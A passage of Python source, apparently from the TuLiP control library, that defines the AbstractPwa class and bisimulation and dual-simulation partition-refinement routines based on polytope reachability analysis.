i.e., agnostic of dynamics
type: L{PropPreservingPartition}
- disc_params: parameters used in discretization that
should be passed to the controller refinement
to ensure consistency
type: dict
If any of the above is not given,
then it is initialized to None.
Notes
=====
1. There could be some redundancy in ppp and ofts,
in that they are both decorated with propositions.
This might be useful to keep each of
them as functional units on their own
(possible to change later).
2. The 'Pwa' in L{AbstractPwa} includes L{LtiSysDyn}
as a special case.
"""
def __init__(
self, ppp=None, ts=None, ppp2ts=None,
pwa=None, pwa_ppp=None, ppp2pwa=None, ppp2sys=None,
orig_ppp=None, ppp2orig=None,
disc_params=None
):
if disc_params is None:
disc_params = dict()
self.ppp = ppp
self.ts = ts
self.ppp2ts = ppp2ts
self.pwa = pwa
self.pwa_ppp = pwa_ppp
self._ppp2pwa = ppp2pwa
self._ppp2sys = ppp2sys
self.orig_ppp = orig_ppp
self._ppp2orig = ppp2orig
# original_regions -> pwa_ppp
# ppp2orig -> ppp2pwa_ppp
# ppp2pwa -> ppp2pwa_sys
self.disc_params = disc_params
def __str__(self):
s = str(self.ppp)
s += str(self.ts)
s += 30 * '-' + '\n'
s += 'Map PPP Regions ---> TS states:\n'
s += self._ppp2other_str(self.ppp2ts) + '\n'
s += 'Map PPP Regions ---> PWA PPP Regions:\n'
s += self._ppp2other_str(self._ppp2pwa) + '\n'
s += 'Map PPP Regions ---> PWA Subsystems:\n'
s += self._ppp2other_str(self._ppp2sys) + '\n'
s += 'Map PPP Regions ---> Original PPP Regions:\n'
s += self._ppp2other_str(self._ppp2orig) + '\n'
s += 'Discretization Options:\n\t'
s += pprint.pformat(self.disc_params) +'\n'
return s
def ts2ppp(self, state):
region_index = self.ppp2ts.index(state)
region = self.ppp[region_index]
return (region_index, region)
def ppp2trans(self, region_index):
"""Return the transition set constraint and active subsystem,
for non-conservative planning.
"""
reg_idx, pwa_region = self.ppp2pwa(region_index)
sys_idx, sys = self.ppp2sys(region_index)
return pwa_region, sys
def ppp2pwa(self, region_index):
"""Return dynamics and predicate-preserving region
and its index for PWA subsystem active in given region.
The returned region is the C{trans_set} used for
non-conservative planning.
@param region_index: index in C{ppp.regions}.
@rtype: C{(i, pwa.pwa_ppp[i])}
"""
j = self._ppp2pwa[region_index]
pwa_region = self.pwa_ppp[j]
return (j, pwa_region)
def ppp2sys(self, region_index):
"""Return index and PWA subsystem active in indexed region.
Semantics: j-th sub-system is active in i-th Region,
where C{j = ppp2pwa[i]}
@param region_index: index in C{ppp.regions}.
@rtype: C{(i, pwa.list_subsys[i])}
"""
# LtiSysDyn ?
if self._ppp2sys is None:
return (0, self.pwa)
subsystem_idx = self._ppp2sys[region_index]
subsystem = self.pwa.list_subsys[subsystem_idx]
return (subsystem_idx, subsystem)
def ppp2orig(self, region_index):
"""Return index and region of original partition.
The original partition is w/o any dynamics,
not even the PWA domains, only the polytopic predicates.
@param region_index: index in C{ppp.regions}.
@rtype: C{(i, orig_ppp.regions[i])}
"""
j = self._ppp2orig[region_index]
orig_region = self.orig_ppp[j]
return (j, orig_region)
def _ppp2other_str(self, ppp2other):
if ppp2other is None:
return ''
s = ''
for i, other in enumerate(ppp2other):
s += '\t\t' + str(i) + ' -> ' + str(other) + '\n'
return s
def _debug_str_(self):
s = str(self.ppp)
s += str(self.ts)
s += '(PWA + Prop)-Preserving Partition'
s += str(self.pwa_ppp)
s += 'Original Prop-Preserving Partition'
s += str(self.orig_ppp)
return s
def plot(self, show_ts=False, only_adjacent=False,
color_seed=None):
"""Plot partition and optionally feasible transitions.
@param show_ts: plot feasible transitions on partition
@type show_ts: bool
@param only_adjacent: plot feasible transitions only
between adjacent regions. This reduces clutter,
but if horizon > 1 and not all horizon used,
then some transitions could be hidden.
@param only_adjacent: bool
"""
ax = _plot_abstraction(self, show_ts, only_adjacent,
color_seed)
return ax
def verify_transitions(self):
logger.info('verifying transitions...')
for from_state, to_state in self.ts.transitions():
i, from_region = self.ts2ppp(from_state)
j, to_region = self.ts2ppp(to_state)
trans_set, sys = self.ppp2trans(i)
params = {'N', 'close_loop', 'use_all_horizon'}
disc_params = {k:v for k,v in self.disc_params.items()
if k in params}
s0 = solve_feasible(from_region, to_region, sys,
trans_set=trans_set, **disc_params)
msg = str(i) + ' ---> ' + str(j)
if not from_region <= s0:
logger.error('incorrect transition: ' + msg)
isect = from_region.intersect(s0)
ratio = isect.volume /from_region.volume
logger.error('intersection volume: ' + str(ratio) + ' %')
else:
logger.info('correct transition: ' + msg)
def _plot_abstraction(ab, show_ts, only_adjacent, color_seed):
if ab.ppp is None or ab.ts is None:
warnings.warn('Either ppp or ts is None.')
return
if show_ts:
ts = ab.ts
ppp2ts = ab.ppp2ts
else:
ts = None
ppp2ts = None
ax = ab.ppp.plot(
ts, ppp2ts, only_adjacent=only_adjacent,
color_seed=color_seed
)
#ax = self.ts.plot()
return ax
def discretize(
part, ssys, N=10, min_cell_volume=0.1,
closed_loop=True, conservative=False,
max_num_poly=5, use_all_horizon=False,
trans_length=1, remove_trans=False,
abs_tol=1e-7,
plotit=False, save_img=False, cont_props=None,
plot_every=1, simu_type='bi'
):
"""Refine the partition via bisimulation
or dual-simulation algorithms, and establish transitions
based on reachability analysis.
Reference
=========
U{[NOTM12]
<https://tulip-control.sourceforge.io/doc/bibliography.html#notm12>}
See Also
========
L{prop2partition.pwa_partition}, L{prop2partition.part2convex}
@param part: L{PropPreservingPartition} object
@param ssys: L{LtiSysDyn} or L{PwaSysDyn} object
@param N: horizon length
@param min_cell_volume: the minimum volume of cells in the resulting
partition.
@param closed_loop: boolean indicating whether the `closed loop`
algorithm should be used. default True.
@param conservative: if true, force sequence in reachability analysis
to stay inside starting cell. If false, safety
is ensured by keeping the sequence inside a convexified
version of the original proposition preserving cell.
@param max_num_poly: maximum number of polytopes in a region to use in
reachability analysis.
@param use_all_horizon: in closed loop algorithm: if we should look
for reachability also in less than N steps.
@param trans_length: the number of polytopes allowed to cross in a
transition. a value of 1 checks transitions
only between neighbors, a value of 2 checks
neighbors of neighbors and so on.
@param remove_trans: if True, remove found transitions between
non-neighbors.
@param abs_tol: maximum volume for an "empty" polytope
@param plotit: plot partitioning as it evolves
@type plotit: boolean,
default = False
@param save_img: save snapshots of partitioning to PDF files,
requires plotit=True
@type save_img: boolean,
default = False
@param cont_props: continuous propositions to plot
@type cont_props: list of C{Polytope}
@param simu_type: if 'bi', use bisimulation partition; if 'dual',
use dual-simulation partition
@type simu_type: string,
default = 'bi'
@rtype: L{AbstractPwa}
"""
if simu_type == 'bi':
AbstractPwa = _discretize_bi(
part, ssys, N, min_cell_volume,
closed_loop, conservative,
max_num_poly, use_all_horizon,
trans_length, remove_trans,
abs_tol,
plotit, save_img, cont_props,
plot_every)
elif simu_type == 'dual':
AbstractPwa = _discretize_dual(
part, ssys, N, min_cell_volume,
closed_loop, conservative,
max_num_poly, use_all_horizon,
trans_length, remove_trans,
abs_tol,
plotit, save_img, cont_props,
plot_every)
else:
raise ValueError(
'Unknown simulation type: "{st}"'.format(
st=simu_type))
return AbstractPwa
def _discretize_bi(
part, ssys, N=10, min_cell_volume=0.1,
closed_loop=True, conservative=False,
max_num_poly=5, use_all_horizon=False,
trans_length=1, remove_trans=False,
abs_tol=1e-7,
plotit=False, save_img=False, cont_props=None,
plot_every=1
):
"""Refine the partition and establish transitions
based on reachability analysis. Use bi-simulation algorithm.
Reference
=========
1. U{[NOTM12]
<https://tulip-control.sourceforge.io/doc/bibliography.html#notm12>}
2. Wagenmaker, A. J.; Ozay, N.
"A Bisimulation-like Algorithm for Abstracting Control Systems."
54th Annual Allerton Conference on CCC 2016
See Also
========
L{prop2partition.pwa_partition}, L{prop2partition.part2convex}
@param part: L{PropPreservingPartition} object
@param ssys: L{LtiSysDyn} or L{PwaSysDyn} object
@param N: horizon length
@param min_cell_volume: the minimum volume of cells in the resulting
partition.
@param closed_loop: boolean indicating whether the `closed loop`
algorithm should be used. default True.
@param conservative: if true, force sequence in reachability analysis
to stay inside starting cell. If false, safety
is ensured by keeping the sequence inside a convexified
version of the original proposition preserving cell.
@param max_num_poly: maximum number of polytopes in a region to use in
reachability analysis.
@param use_all_horizon: in closed loop algorithm: if we should look
for reachability also in less than N steps.
@param trans_length: the number of polytopes allowed to cross in a
transition. a value of 1 checks transitions
only between neighbors, a value of 2 checks
neighbors of neighbors and so on.
@param remove_trans: if True, remove found transitions between
non-neighbors.
@param abs_tol: maximum volume for an "empty" polytope
@param plotit: plot partitioning as it evolves
@type plotit: boolean,
default = False
@param save_img: save snapshots of partitioning to PDF files,
requires plotit=True
@type save_img: boolean,
default = False
@param cont_props: continuous propositions to plot
@type cont_props: list of C{Polytope}
@rtype: L{AbstractPwa}
"""
start_time = os.times()[0]
orig_ppp = part
min_cell_volume = (min_cell_volume /np.finfo(np.double).eps
*np.finfo(np.double).eps)
ispwa = isinstance(ssys, PwaSysDyn)
islti = isinstance(ssys, LtiSysDyn)
if ispwa:
(part, ppp2pwa, part2orig) = pwa_partition(ssys, part)
else:
part2orig = range(len(part))
# Save original polytopes, require them to be convex
if conservative:
orig_list = None
orig = [0]
else:
(part, new2old) = part2convex(part) # convexify
part2orig = [part2orig[i] for i in new2old]
# map new regions to pwa subsystems
if ispwa:
ppp2pwa = [ppp2pwa[i] for i in new2old]
remove_trans = False # already allowed in nonconservative
orig_list = []
for poly in part:
if len(poly) == 0:
orig_list.append(poly.copy())
elif len(poly) == 1:
orig_list.append(poly[0].copy())
else:
raise Exception("discretize: "
"problem in convexification")
orig = list(range(len(orig_list)))
# Cheby radius of disturbance set
# (defined within the loop for pwa systems)
if islti:
if len(ssys.E) > 0:
rd = ssys.Wset.chebR
else:
rd = 0.
# Initialize matrix for pairs to check
IJ = part.adj.copy().toarray()
logger.debug("\n Starting IJ: \n" + str(IJ) )
# next line omitted in discretize_overlap
IJ = reachable_within(trans_length, IJ,
part.adj.toarray())
# Initialize output
num_regions = len(part)
transitions = np.zeros(
[num_regions, num_regions],
dtype = int
)
sol = deepcopy(part.regions)
adj = part.adj.copy().toarray()
# next 2 lines omitted in discretize_overlap
if ispwa:
subsys_list = list(ppp2pwa)
else:
subsys_list = None
ss = ssys
# init graphics
if plotit:
try:
import matplotlib.pyplot as plt
plt.ion()
fig, (ax1, ax2) = plt.subplots(1, 2)
ax1.axis('scaled')
ax2.axis('scaled')
file_extension = 'pdf'
except:
logger.error('failed to import matplotlib')
plt = None
else:
plt = None
iter_count = 0
# List of how many "new" regions
# have been created for each region
# and a list of original number of neighbors
#num_new_reg = np.zeros(len(orig_list))
#num_orig_neigh = np.sum(adj, axis=1).flatten() - 1
progress = list()
# Do the abstraction
while np.sum(IJ) > 0:
ind = np.nonzero(IJ)
# i,j swapped in discretize_overlap
i = ind[1][0]
j = ind[0][0]
IJ[j, i] = 0
si = sol[i]
sj = sol[j]
si_tmp = deepcopy(si)
sj_tmp = deepcopy(sj)
if ispwa:
ss = ssys.list_subsys[subsys_list[i]]
if len(ss.E) > 0:
rd, xd = pc.cheby_ball(ss.Wset)
else:
rd = 0.
if conservative:
# Don't use trans_set
trans_set = None
else:
# Use original cell as trans_set
trans_set = orig_list[orig[i]]
S0 = solve_feasible(
si, sj, ss, N, closed_loop,
use_all_horizon, trans_set, max_num_poly
)
msg = '\n Working with partition cells: {i}, {j}'.format(i=i,
j=j)
logger.info(msg)
msg = '\t{i} (#polytopes = {num}), and:\n'.format(i=i,
num=len(si))
msg += '\t{j} (#polytopes = {num})\n'.format(j=j,
num=len(sj))
if ispwa:
msg += '\t with active subsystem: '
msg += '{sys}\n'.format(sys=subsys_list[i])
msg += '\t Computed reachable set S0 with volume: '
msg += '{vol}\n'.format(vol=S0.volume)
logger.debug(msg)
#logger.debug(r'si \cap s0')
isect = si.intersect(S0)
vol1 = isect.volume
risect, xi = pc.cheby_ball(isect)
#logger.debug(r'si \ s0')
diff = si.diff(S0)
vol2 = diff.volume
rdiff, xd = pc.cheby_ball(diff)
# if pc.is_fulldim(pc.Region([isect]).intersect(diff)):
# logging.getLogger('tulip.polytope').setLevel(logging.DEBUG)
# diff = pc.mldivide(si, S0, save=True)
#
# ax = S0.plot()
# ax.axis([0.0, 1.0, 0.0, 2.0])
# ax.figure.savefig('./img/s0.pdf')
#
# ax = si.plot()
# ax.axis([0.0, 1.0, 0.0, 2.0])
# ax.figure.savefig('./img/si.pdf')
#
# ax = isect.plot()
# ax.axis([0.0, 1.0, 0.0, 2.0])
# ax.figure.savefig('./img/isect.pdf')
#
# ax = diff.plot()
# ax.axis([0.0, 1.0, 0.0, 2.0])
# ax.figure.savefig('./img/diff.pdf')
#
# ax = isect.intersect(diff).plot()
# ax.axis([0.0, 1.0, 0.0, 2.0])
# ax.figure.savefig('./img/diff_cap_isect.pdf')
#
# logger.error(r'Intersection \cap Difference != \emptyset')
#
# assert(False)
if vol1 <= min_cell_volume:
logger.warning('\t too small: si \\cap Pre(sj), '
'so discard intersection')
if vol1 <= min_cell_volume and isect:
logger.warning('\t discarded non-empty intersection: '
'consider reducing min_cell_volume')
if vol2 <= min_cell_volume:
logger.warning('\t too small: si \\ Pre(sj), so not reached it')
# We don't want our partitions to be smaller than the disturbance set
# Could be a problem since cheby radius is calculated for smallest
# convex polytope, so if we have a region we might throw away a good
# cell.
if (
vol1 > min_cell_volume and
risect > rd and
vol2 > min_cell_volume and
rdiff > rd):
# Make sure new areas are Regions and add proposition lists
if len(isect) == 0:
isect = pc.Region([isect], si.props)
else:
isect.props = si.props.copy()
if len(diff) == 0:
diff = pc.Region([diff], si.props)
else:
diff.props = si.props.copy()
# replace si by intersection (single state)
isect_list = pc.separate(isect)
sol[i] = isect_list[0]
# cut difference into connected pieces
difflist = pc.separate(diff)
difflist += isect_list[1:]
# n_isect = len(isect_list) -1
num_new = len(difflist)
# add each piece, as a new state
for region in difflist:
sol.append(region)
# keep track of PWA subsystems map to new states
if ispwa:
subsys_list.append(subsys_list[i])
n_cells = len(sol)
new_idx = range(n_cells-1, n_cells-num_new-1, -1)
"""Update transition matrix"""
transitions = np.pad(transitions, (0,num_new), 'constant')
transitions[i, :] = np.zeros(n_cells)
for r in new_idx:
#transitions[:, r] = transitions[:, i]
# All sets reachable from start are reachable from both part's
# except possibly the new part
transitions[i, r] = 0
transitions[j, r] = 0
# sol[j] is reachable from intersection of sol[i] and S0
if i != j:
transitions[j, i] = 1
# sol[j] is reachable from each piece os S0 \cap sol[i]
#for k in range(n_cells-n_isect-2, n_cells):
# transitions[j, k] = 1
"""Update adjacency matrix"""
old_adj = np.nonzero(adj[i, :])[0]
# reset new adjacencies
adj[i, :] = np.zeros([n_cells -num_new])
adj[:, i] = np.zeros([n_cells -num_new])
adj[i, i] = 1
adj = np.pad(adj, (0, num_new), 'constant')
for r in new_idx:
adj[i, r] = 1
adj[r, i] = 1
adj[r, r] = 1
if not conservative:
orig = np.hstack([orig, orig[i]])
# adjacencies between pieces of isect and diff
for r in new_idx:
for k in new_idx:
if r is k:
continue
if pc.is_adjacent(sol[r], sol[k]):
adj[r, k] = 1
adj[k, r] = 1
msg = ''
if logger.getEffectiveLevel() <= logging.DEBUG:
msg += '\t\n Adding states {i} and '.format(i=i)
for r in new_idx:
msg += '{r} and '.format(r=r)
msg += '\n'
logger.debug(msg)
for k in np.setdiff1d(old_adj, [i,n_cells-1]):
# Every "old" neighbor must be the neighbor
# of at least one of the new
if pc.is_adjacent(sol[i], sol[k]):
adj[i, k] = 1
adj[k, i] = 1
elif remove_trans and (trans_length == 1):
# Actively remove transitions between non-neighbors
transitions[i, k] = 0
transitions[k, i] = 0
for r in new_idx:
if pc.is_adjacent(sol[r], sol[k]):
adj[r, k] = 1
adj[k, r] = 1
elif remove_trans and (trans_length == 1):
# Actively remove transitions between non-neighbors
transitions[r, k] = 0
transitions[k, r] = 0
"""Update IJ matrix"""
IJ = np.pad(IJ, (0,num_new), 'constant')
adj_k = reachable_within(trans_length, adj, adj)
sym_adj_change(IJ, adj_k, transitions, i)
for r in new_idx:
sym_adj_change(IJ, adj_k, transitions, r)
if logger.getEffectiveLevel() <= logging.DEBUG:
msg = '\n\n Updated adj: \n{adj}'.format(adj=adj)
msg += '\n\n Updated trans: \n{trans}'.format(trans=
transitions)
msg += '\n\n Updated IJ: \n{IJ}'.format(IJ=IJ)
logger.debug(msg)
logger.info('Divided region: {i}\n'.format(i=i))
elif vol2 < abs_tol:
logger.info('Found: {i} ---> {j}\n'.format(i=i, j=j))
transitions[j,i] = 1
else:
if logger.level <= logging.DEBUG:
msg = '\t Unreachable: {i} --X--> {j}\n'.format(i=i, j=j)
msg += '\t\t diff vol: {vol2}\n'.format(vol2=vol2)
msg += '\t\t intersect vol: {vol1}\n'.format(vol1=vol1)
logger.debug(msg)
else:
logger.info('\t unreachable\n')
transitions[j,i] = 0
# check to avoid overlapping Regions
if debug:
tmp_part = PropPreservingPartition(
domain=part.domain,
regions=sol, adj=sp.lil_matrix(adj),
prop_regions=part.prop_regions
)
assert(tmp_part.is_partition() )
n_cells = len(sol)
progress_ratio = 1 - float(np.sum(IJ) ) /n_cells**2
progress += [progress_ratio]
msg = '\t total # polytopes: {n_cells}\n'.format(n_cells=n_cells)
msg += '\t progress ratio: {pr}\n'.format(pr=progress_ratio)
logger.info(msg)
iter_count += 1
# no plotting ?
if not plotit:
continue
if plt is None or plot_partition is None:
continue
if iter_count % plot_every != 0:
continue
tmp_part = PropPreservingPartition(
domain=part.domain,
regions=sol, adj=sp.lil_matrix(adj),
prop_regions=part.prop_regions
)
# plot pair under reachability check
ax2.clear()
si_tmp.plot(ax=ax2, color='green')
sj_tmp.plot(ax2, color='red', hatch='o', alpha=0.5)
plot_transition_arrow(si_tmp, sj_tmp, ax2)
S0.plot(ax2, color='none', hatch='/', alpha=0.3)
fig.canvas.draw()
# plot partition
ax1.clear()
plot_partition(tmp_part, transitions.T, ax=ax1, color_seed=23)
# plot dynamics
ssys.plot(ax1, show_domain=False)
# plot hatched continuous propositions
part.plot_props(ax1)
fig.canvas.draw()
# scale view based on domain,
# not only the current polytopes si, sj
l,u = part.domain.bounding_box
ax2.set_xlim(l[0,0], u[0,0])
ax2.set_ylim(l[1,0], u[1,0])
if save_img:
fname = 'movie' +str(iter_count).zfill(3)
fname += '.' + file_extension
fig.savefig(fname, dpi=250)
plt.pause(1)
new_part = PropPreservingPartition(
domain=part.domain,
regions=sol, adj=sp.lil_matrix(adj),
prop_regions=part.prop_regions
)
# check completeness of adjacency matrix
if debug:
tmp_part = deepcopy(new_part)
tmp_part.compute_adj()
# Generate transition system and add transitions
ofts = trs.FTS()
adj = sp.lil_matrix(transitions.T)
n = adj.shape[0]
ofts_states = range(n)
ofts.states.add_from(ofts_states)
ofts.transitions.add_adj(adj, ofts_states)
# Decorate TS with state labels
atomic_propositions = set(part.prop_regions)
ofts.atomic_propositions.add_from(atomic_propositions)
for state, region in zip(ofts_states, sol):
state_prop = region.props.copy()
ofts.states.add(state, ap=state_prop)
param = {
'N':N,
'trans_length':trans_length,
'closed_loop':closed_loop,
'conservative':conservative,
'use_all_horizon':use_all_horizon,
'min_cell_volume':min_cell_volume,
'max_num_poly':max_num_poly
}
ppp2orig = [part2orig[x] for x in orig]
end_time = os.times()[0]
msg = 'Total abstraction time: {time}[sec]'.format(time=
end_time - start_time)
print(msg)
logger.info(msg)
if save_img and plt is not None:
fig, ax = plt.subplots(1, 1)
plt.plot(progress)
ax.set_xlabel('iteration')
ax.set_ylabel('progress ratio')
ax.figure.savefig('progress.pdf')
return AbstractPwa(
ppp=new_part,
ts=ofts,
ppp2ts=ofts_states,
pwa=ssys,
pwa_ppp=part,
ppp2pwa=orig,
ppp2sys=subsys_list,
orig_ppp=orig_ppp,
ppp2orig=ppp2orig,
disc_params=param
)
def _discretize_dual(
part, ssys, N=10, min_cell_volume=0.1,
closed_loop=True, conservative=False,
max_num_poly=5, use_all_horizon=False,
trans_length=1, remove_trans=False,
abs_tol=1e-7,
plotit=False, save_img=False, cont_props=None,
plot_every=1
):
"""Refine the partition and establish transitions
based on reachability analysis. Use dual-simulation algorithm.
Reference
=========
1. U{[NOTM12]
<https://tulip-control.sourceforge.io/doc/bibliography.html#notm12>}
2. Wagenmaker, A. J.; Ozay, N.
"A Bisimulation-like Algorithm for Abstracting Control Systems."
54th Annual Allerton Conference on CCC 2016
See Also
========
L{prop2partition.pwa_partition}, L{prop2partition.part2convex}
@param part: L{PropPreservingPartition} object
@param ssys: L{LtiSysDyn} or L{PwaSysDyn} object
@param N: horizon length
@param min_cell_volume: the minimum volume of cells in the resulting
partition.
@param closed_loop: boolean indicating whether the `closed loop`
algorithm should be used. default True.
@param conservative: if true, force sequence in reachability analysis
to stay inside starting cell. If false, safety
is ensured by keeping the sequence inside a convexified
version of the original proposition preserving cell.
@param max_num_poly: maximum number of polytopes in a region to use in
reachability analysis.
@param use_all_horizon: in closed loop algorithm: if we should look
for reachability also in less than N steps.
@param trans_length: the number of polytopes allowed to cross in a
transition. a value of 1 checks transitions
only between neighbors, a value of 2 checks
neighbors of neighbors and so on.
@param remove_trans: if True, remove found transitions between
non-neighbors.
@param abs_tol: maximum volume for an "empty" polytope
@param plotit: plot partitioning as it evolves
@type plotit: boolean,
default = False
@param save_img: save snapshots of partitioning to PDF files,
requires plotit=True
@type save_img: boolean,
default = False
@param cont_props: continuous propositions to plot
@type cont_props: list of C{Polytope}
@param simu_type: flag used to choose abstraction algorithm
(bisimulation or dual-simulation).
@type simu_type: string, 'bi' or 'dual'
default = 'bi'
@rtype: L{AbstractPwa}
"""
start_time = os.times()[0]
orig_ppp = part
min_cell_volume = (min_cell_volume /np.finfo(np.double).eps
*np.finfo(np.double).eps)
ispwa = isinstance(ssys, PwaSysDyn)
islti = isinstance(ssys, LtiSysDyn)
if ispwa:
(part, ppp2pwa, part2orig) = pwa_partition(ssys, part)
else:
part2orig = range(len(part))
# Save original polytopes, require them to be convex
if conservative:
orig_list = None
orig = [0]
else:
(part, new2old) = part2convex(part) # convexify
part2orig = [part2orig[i] for i in new2old]
# map new regions to pwa subsystems
if ispwa:
ppp2pwa = [ppp2pwa[i] for i in new2old]
remove_trans = False # already allowed in nonconservative
orig_list = []
for poly in part:
if len(poly) == 0:
orig_list.append(poly.copy())
elif len(poly) == 1:
orig_list.append(poly[0].copy())
else:
raise Exception("discretize: "
"problem in convexification")
orig = list(range(len(orig_list)))
# Cheby radius of disturbance set
# (defined within the loop for pwa systems)
if islti:
if len(ssys.E) > 0:
rd = ssys.Wset.chebR
else:
rd = 0.
# Initialize matrix for pairs to check
IJ = part.adj.copy().toarray()
logger.debug("\n Starting IJ: \n" + str(IJ) )
# next line omitted in discretize_overlap
IJ = reachable_within(trans_length, IJ,
part.adj.toarray())
# Initialize output
num_regions = len(part)
transitions = np.zeros(
[num_regions, num_regions],
dtype = int
)
sol = deepcopy(part.regions)
adj = part.adj.copy().toarray()
# next 2 lines omitted in discretize_overlap
if ispwa:
subsys_list = list(ppp2pwa)
else:
subsys_list = None
ss = ssys
# init graphics
if plotit:
try:
import matplotlib.pyplot as plt
plt.ion()
fig, (ax1, ax2) = plt.subplots(1, 2)
ax1.axis('scaled')
ax2.axis('scaled')
file_extension = 'pdf'
except:
logger.error('failed to import matplotlib')
plt = None
else:
plt = None
iter_count = 0
# List of how many "new" regions
# have been created for each region
# and a list of original number of neighbors
#num_new_reg = np.zeros(len(orig_list))
#num_orig_neigh = np.sum(adj, axis=1).flatten() - 1
progress = list()
# Do the abstraction
while np.sum(IJ) > 0:
ind = np.nonzero(IJ)
# i,j swapped in discretize_overlap
i = ind[1][0]
j = ind[0][0]
IJ[j, i] = 0
si = sol[i]
sj = sol[j]
si_tmp = deepcopy(si)
sj_tmp = deepcopy(sj)
#num_new_reg[i] += 1
#print(num_new_reg)
if ispwa:
ss = ssys.list_subsys[subsys_list[i]]
if len(ss.E) > 0:
rd, xd = pc.cheby_ball(ss.Wset)
else:
rd = 0.
if conservative:
# Don't use trans_set
trans_set = None
else:
# Use original cell as trans_set
trans_set = orig_list[orig[i]]
S0 = solve_feasible(
si, sj, ss, N, closed_loop,
use_all_horizon, trans_set, max_num_poly
)
msg = '\n Working with partition cells: {i}, {j}'.format(i=i,
j=j)
logger.info(msg)
msg = '\t{i} (#polytopes = {num}), and:\n'.format(i=i,
num=len(si))
msg += '\t{j} (#polytopes = {num})\n'.format(j=j,
num=len(sj))
if ispwa:
msg += '\t with active subsystem: '
msg += '{sys}\n'.format(sys=subsys_list[i])
msg += '\t Computed reachable set S0 with volume: '
msg += '{vol}\n'.format(vol=S0.volume)
logger.debug(msg)
#logger.debug(r'si \cap s0')
isect = si.intersect(S0)
vol1 = isect.volume
risect, xi = pc.cheby_ball(isect)
#logger.debug(r'si \ s0')
rsi, xd = pc.cheby_ball(si)
vol2 = si.volume-vol1 # not accurate. need to check polytope class
if vol1 <= min_cell_volume:
logger.warning('\t too small: si \\cap Pre(sj), '
'so discard intersection')
if vol1 <= min_cell_volume and isect:
logger.warning('\t discarded non-empty intersection: '
'consider reducing min_cell_volume')
if vol2 <= min_cell_volume:
logger.warning('\t too small: si \\ Pre(sj), so not reached it')
# indicate if S0 has exists in sol
check_isect = False
# We don't want our partitions to be smaller than the disturbance set
# Could be a problem since cheby radius is calculated for smallest
# convex polytope, so if we have a region we might throw away a good
# cell.
if (
vol1 > min_cell_volume and
risect > rd and
vol2 > min_cell_volume and
rsi > rd):
# check if the intersection has existed in current partitions
for idx in range(len(sol)):
if(sol[idx] == isect):
logger.info('Found: {idx} ---> {j} '.format(idx=idx,
j=j))
logger.info('intersection exists.\n')
transitions[j, idx] = 1
check_isect = True
if not check_isect:
# Make sure new areas are Regions and add proposition lists
if len(isect) == 0:
isect = pc.Region([isect], si.props)
else:
isect.props = si.props.copy()
# add intersection in sol
isect_list = pc.separate(isect)
sol.append(isect_list[0])
n_cells = len(sol)
new_idx = n_cells-1
"""Update adjacency matrix"""
old_adj = np.nonzero(adj[i, :])[0]
adj = np.pad(adj, (0, 1), 'constant')
# cell i and new_idx are adjacent
adj[i, new_idx] = 1
adj[new_idx, i] = 1
adj[new_idx, new_idx] = 1
if not conservative:
orig = np.hstack([orig, orig[i]])
msg = ''
if logger.getEffectiveLevel() <= logging.DEBUG:
msg += '\t\n Adding states {new_idx}\n'.format(new_idx=
new_idx)
logger.debug(msg)
for k in np.setdiff1d(old_adj, [i,n_cells-1]):
# Every "old" neighbor must be the neighbor
# of at least one of the new
if pc.is_adjacent(sol[new_idx], sol[k]):
adj[new_idx, k] = 1
adj[k, new_idx] = 1
elif remove_trans and (trans_length == 1):
# Actively remove transitions between non-neighbors
transitions[new_idx, k] = 0
transitions[k, new_idx] = 0
"""Update transition matrix"""
transitions = np.pad(transitions, (0,1), 'constant')
adj_k = reachable_within(trans_length, adj, adj)
# transitions i ---> k for k is neighbor of new_idx should be
# kept by new_idx
transitions[:, new_idx] = np.multiply(transitions[:, i],
adj_k[:, i])
# if j and new_idx are neighbor, then add new_idx ---> j
if adj_k[j, new_idx] != 0:
transitions[j, new_idx] = 1
"""Update IJ matrix"""
IJ = np.pad(IJ, (0, 1), 'constant')
sym_adj_change(IJ, adj_k, transitions, i)
sym_adj_change(IJ, adj_k, transitions, new_idx)
if logger.getEffectiveLevel() <= logging.DEBUG:
msg = '\n\n Updated adj: \n{adj}'.format(adj=adj)
msg += '\n\n Updated trans: \n{trans}'.format(trans=
transitions)
msg += '\n\n Updated IJ: \n{IJ}'.format(IJ=IJ)
logger.debug(msg)
logger.info('Divided region: {i}\n'.format(i=i))
elif vol2 < abs_tol:
logger.info('Found: {i} ---> {j}\n'.format(i=i, j=j))
transitions[j, i] = 1
else:
if logger.level <= logging.DEBUG:
msg = '\t Unreachable: {i} --X--> {j}\n'.format(i=i, j=j)
msg += '\t\t diff vol: {vol2}\n'.format(vol2=vol2)
msg += '\t\t intersect vol: {vol1}\n'.format(vol1=vol1)
logger.debug(msg)
else:
logger.info('\t unreachable\n')
transitions[j, i] = 0
# check to avoid overlapping Regions
if debug:
tmp_part = PropPreservingPartition(
domain=part.domain,
regions=sol, adj=sp.lil_matrix(adj),
prop_regions=part.prop_regions
)
assert(tmp_part.is_partition() )
n_cells = len(sol)
progress_ratio = 1 - float(np.sum(IJ) ) /n_cells**2
progress += [progress_ratio]
msg = '\t total # polytopes: {n_cells}\n'.format(n_cells=n_cells)
msg += '\t progress ratio: {pr}\n'.format(pr=progress_ratio)
logger.info(msg)
iter_count += 1
# needs to be removed later
# if(iter_count>=700):
# break
# no plotting ?
if not plotit:
continue
if plt is None or plot_partition is None:
continue
if iter_count % plot_every != 0:
continue
tmp_part = PropPreservingPartition(
domain=part.domain,
regions=sol, adj=sp.lil_matrix(adj),
prop_regions=part.prop_regions
)
# plot pair under reachability check
ax2.clear()
si_tmp.plot(ax=ax2, color='green')
sj_tmp.plot(ax2, color='red', hatch='o', alpha=0.5)
plot_transition_arrow(si_tmp, sj_tmp, ax2)
S0.plot(ax2, color='none', hatch='/', alpha=0.3)
fig.canvas.draw()
# plot partition
ax1.clear()
plot_partition(tmp_part, transitions.T, ax=ax1, color_seed=23)
# plot dynamics
ssys.plot(ax1, show_domain=False)
# plot hatched continuous propositions
part.plot_props(ax1)
fig.canvas.draw()
# scale view based on domain,
# not only the current polytopes si, sj
l,u = part.domain.bounding_box
ax2.set_xlim(l[0,0], u[0,0])
ax2.set_ylim(l[1,0], u[1,0])
if save_img:
fname = 'movie' +str(iter_count).zfill(3)
fname += '.' + file_extension
fig.savefig(fname, dpi=250)
plt.pause(1)
new_part = PropPreservingPartition(
domain=part.domain,
regions=sol, adj=sp.lil_matrix(adj),
prop_regions=part.prop_regions
)
# check completeness of adjacency matrix
if debug:
tmp_part = deepcopy(new_part)
tmp_part.compute_adj()
# Generate transition system and add transitions
